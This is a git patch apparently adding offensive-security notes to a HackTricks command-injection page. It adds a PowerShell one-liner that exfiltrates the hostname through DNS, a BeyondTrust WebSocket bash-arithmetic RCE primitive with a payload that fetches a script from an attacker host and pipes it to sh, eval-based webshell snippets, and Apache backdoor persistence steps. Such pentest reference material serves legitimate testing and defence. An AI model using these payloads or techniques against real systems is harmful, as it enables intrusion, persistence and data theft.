From 4fa58b5b15f59c71a00468e76ca649cc601bb0e5 Mon Sep 17 00:00:00 2001
From: HackTricks News Bot <bot@hacktricks.xyz>
Date: Fri, 20 Feb 2026 02:01:07 +0000
Subject: [PATCH] Add content from: VShell and SparkRAT Observed in
 Exploitation of BeyondTrust ...

---
 src/pentesting-web/command-injection.md | 21 +++++++++++++++++++++
 1 file changed, 21 insertions(+)

diff --git a/src/pentesting-web/command-injection.md b/src/pentesting-web/command-injection.md
index fab61eb2a4d..da28cd32ae7 100644
--- a/src/pentesting-web/command-injection.md
+++ b/src/pentesting-web/command-injection.md
@@ -116,6 +116,12 @@ Online tools to check for DNS based data exfiltration:
 - dnsbin.zhack.ca
 - pingb.in
 
+When egress is filtered, **hex-encode short IDs into DNS labels** (≤63 bytes per label). Example PowerShell one-liner that encodes the hostname and queries an OAST domain:
+
+```powershell
+$h=[System.BitConverter]::ToString([Text.Encoding]::UTF8.GetBytes($env:COMPUTERNAME)).Replace('-','');$labels=($h -split '(.{1,63})' | ? {$_});$d=($labels -join ".")+".oastify.com";nslookup $d
+```
+
 ### Filtering bypass
 
 #### Windows
@@ -206,6 +212,20 @@ Example payloads:
 
 Because these diagnostics are parsed by the JVM itself, no shell metacharacters are required and the command runs with the same integrity level as the launcher. Desktop IPC bugs that forward user-supplied JVM flags (see [Localhost WebSocket abuse](websocket-attacks.md#localhost-websocket-abuse--browser-port-discovery)) therefore translate directly into OS command execution.
 
+### Bash arithmetic evaluation via WebSocket handshake parameters
+
+Some WebSocket daemons parse client "version" fields (e.g., `remoteVersion` in **BeyondTrust thin-scc-wrapper**) with bash arithmetic `(( ... ))`/`let`. Bash expands command substitutions inside operands, so attacker-controlled values can execute **during the handshake** without auth.
+
+- **Primitive:** use a non-numeric operand with command substitution, e.g., `remoteVersion=a[$(id)]0` or `a[$(curl attacker/p.sh|sh)]0`; `$(...)` runs before the numeric compare.
+- **Delivery:** connect to the WS endpoint (e.g., `/nw` or `get_portal_info`) and send the crafted `remoteVersion`; the wrapper executes it as the service user.
+- **Validation bypass:** superficial “numeric only” checks still reach bash arithmetic unless strict integer parsing rejects expressions first.
+
+#### Post-exploitation patterns observed after thin-scc-wrapper RCE
+
+- **Ephemeral admin hash swap:** backup the admin DB hash, generate a known-password hash with the appliance hasher (e.g., `check_auth`), swap it briefly to login, then restore and delete helpers.
+- **Webshells with gated params and parseable output:** minimal guards like `if(isset($_GET['aaaa'])) eval($_POST['1']);`; multi-source shells read POST/GET/Cookie, `base64_decode` input, `eval()`, and wrap output with `echo "DQo="` before/after for China Chopper/AntSword parsing.
+- **Apache config STOMP persistence:** drop a password-protected backdoor (e.g., `file_save.php` checking `?vjwr=`), append a `Location` routing it to a chosen PHP-FPM socket (e.g., `/ns/tmp/php-fpm.sock`), restart Apache, then overwrite the config with the clean backup so disk artifacts look benign.
+
 ## PaperCut NG/MF SetupCompleted auth bypass -> print scripting RCE
 
 - Vulnerable NG/MF builds (e.g., 22.0.5 Build 63914) expose `/app?service=page/SetupCompleted`; browsing there and clicking **Login** returns a valid `JSESSIONID` without credentials (authentication bypass in the setup flow).
@@ -240,5 +260,6 @@ https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/command_inject
 - [When WebSockets Lead to RCE in CurseForge](https://elliott.diy/blog/curseforge/)
 - [PaperCut NG/MF SetupCompleted auth bypass → print scripting RCE](https://0xdf.gitlab.io/2026/02/03/htb-bamboo.html)
 - [CVE-2023-27350.py (auth bypass + print scripting automation)](https://github.com/horizon3ai/CVE-2023-27350/blob/main/CVE-2023-27350.py)
+- [Unit 42 – VShell and SparkRAT Observed in Exploitation of BeyondTrust Critical Vulnerability (CVE-2026-1731)](https://unit42.paloaltonetworks.com/beyondtrust-cve-2026-1731/)
 
 {{#include ../banners/hacktricks-training.md}}